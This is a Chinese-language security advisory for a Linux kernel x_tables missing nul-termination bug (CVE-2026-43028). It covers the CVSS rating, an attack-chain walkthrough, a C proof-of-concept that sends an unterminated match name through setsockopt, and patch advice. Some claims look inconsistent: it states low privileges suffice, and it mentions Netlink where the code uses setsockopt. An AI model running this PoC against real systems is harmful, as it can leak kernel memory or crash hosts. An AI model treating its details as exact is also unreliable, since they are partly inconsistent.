CVE-2026-43028 Linux内核x_tables名称未截断漏洞

漏洞信息

漏洞编号

CVE-2026-43028

漏洞类型

内存破坏

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的netfilter子系统存在一个安全漏洞，具体位于x_tables模块中。该漏洞源于代码未确保名称字符串以空字符（\0）结尾。当系统处理特制的网络表规则时，攻击者可以利用此漏洞传递未正确终止的字符串，导致内核在预期C风格字符串的函数中读取越界。这可能引发敏感信息泄露或系统崩溃（拒绝服务）。该问题已在最新的稳定版本提交中得到修复，建议用户尽快更新系统内核以防范潜在风险。

技术细节

该漏洞发生在Linux内核的netfilter框架中，特别是x_tables（iptables等工具使用的内核接口）组件。在处理扩展名或匹配名时，内核代码假设传入的名称缓冲区是以空字符结尾的标准C字符串。然而，由于缺少严格的边界检查和空字符验证，如果用户空间提供的名称填满了整个分配的缓冲区而没有留出空间给终止符'\0'，内核后续的字符串操作函数（如strcmp或strlen）将会继续读取内存，直到遇到随机的空字节为止。攻击者需要具备本地低权限（PR:L）才能利用此漏洞，通常通过调用setsockopt系统调用来配置iptables规则。通过精心构造恶意的Netlink消息，攻击者可以触发越界读取。这可能导致内核堆栈或堆数据的泄露（机密性影响），或者在某些情况下导致内核崩溃，从而造成拒绝服务（可用性影响）。修复补丁通过在将名称传递给字符串处理函数之前，显式检查名称缓冲区是否包含空字符来解决这个问题。

攻击链分析

STEP 1

步骤1：获取本地访问

攻击者获得目标Linux系统的本地低权限用户访问权限。

STEP 2

步骤2：构造恶意数据

攻击者编写恶意程序，构造一个特制的iptables规则请求，其中x_tables相关的名称字段填满非空字符，导致缺少字符串终止符。

STEP 3

步骤3：触发漏洞

攻击者执行恶意程序，利用setsockopt系统调用将恶意数据传递给内核的netfilter子系统。

STEP 4

步骤4：内核越界读取

内核x_tables模块在处理名称时，因缺少空终止符而继续向后读取内存，导致越界访问。

STEP 5

步骤5：产生影响

越界读取可能导致内核内存信息泄露（高机密性影响）或触发内核崩溃导致拒绝服务（高可用性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43028: Linux kernel x_tables missing nul-termination
 * This code attempts to trigger the vulnerability by sending a specially crafted
 * iptables replacement entry where the match name is not null-terminated.
 * Compile: gcc -o poc_exploit poc_exploit.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define XT_EXTENSION_MAXNAMELEN 29

int main() {
    int sockfd;
    struct ipt_replace *repl;
    struct ipt_entry *entry;
    struct ipt_entry_match *match;
    size_t size;

    sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }

    // Allocate memory for the replacement structure
    size = sizeof(struct ipt_replace) + sizeof(struct ipt_entry) + sizeof(struct ipt_entry_match);
    repl = calloc(1, size);
    if (!repl) {
        perror("calloc");
        close(sockfd);
        return 1;
    }

    // Setup basic replacement info
    strcpy(repl->name, "filter");
    repl->valid_hooks = 0;
    repl->num_entries = 1;
    repl->size = size - sizeof(struct ipt_replace);
    repl->num_counters = 0;
    repl->counters = NULL;

    entry = (struct ipt_entry *)(repl->entries);
    entry->target_offset = sizeof(struct ipt_entry) + sizeof(struct ipt_entry_match);
    entry->next_offset = sizeof(struct ipt_entry) + sizeof(struct ipt_entry_match);

    match = (struct ipt_entry_match *)(entry->elems);
    // Fill the name with 'A's to remove the null terminator
    memset(match->u.user.name, 'A', XT_EXTENSION_MAXNAMELEN);
    match->u.user.match_size = sizeof(struct ipt_entry_match);

    // Attempt to set thesockopt to trigger the bug
    if (setsockopt(sockfd, IPPROTO_IP, IPT_SO_SET_REPLACE, repl, size) != 0) {
        perror("setsockopt");
        printf("Failed to trigger vulnerability (might be patched or require perms).\n");
    } else {
        printf("Payload sent successfully.\n");
    }

    free(repl);
    close(sockfd);
    return 0;
}

影响范围

Linux Kernel (Versions prior to commits 673bbd36cba21d10a10f0932f479df7468e26fbb, 73124608172890306b85f2206d8b3cac20e324f1, etc.)

防御指南

临时缓解措施

建议立即升级Linux内核至包含特定提交修复的版本。如果无法立即重启更新，应严格限制不可信用户在系统上的本地执行权限，并监控内核日志是否出现与netfilter相关的异常崩溃或警告信息。